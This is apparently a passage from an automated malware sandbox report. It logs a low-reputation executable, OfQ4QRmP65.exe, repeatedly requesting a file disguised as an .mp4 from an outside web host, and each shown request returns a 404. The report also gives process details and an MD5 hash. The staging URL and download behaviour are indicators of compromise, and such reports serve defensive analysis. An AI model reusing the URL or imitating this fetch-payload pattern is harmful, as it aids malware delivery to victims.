                          2025-03-07 14:50:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          58192.168.2.11497645.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:45 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:45 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:43 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:45 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          59192.168.2.11497655.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:48 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:48 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:46 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          60192.168.2.11497665.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:50 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:51 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:49 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          61192.168.2.11497675.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:53 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:54 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:52 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          62192.168.2.11497685.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:56 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:57 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:54 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          63192.168.2.11497695.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:59 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:59 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:57 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          64192.168.2.11497705.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:51:02 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:51:02 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:51:00 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:51:02 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Target ID:0
                          Start time:09:47:56
                          Start date:07/03/2025
                          Path:C:\Users\user\Desktop\OfQ4QRmP65.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\OfQ4QRmP65.exe"
                          Imagebase:0x1a0000
                          File size:38'912 bytes
                          MD5 hash:2B93577260F06791D5ACC7D6D9A1C492
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Reset < >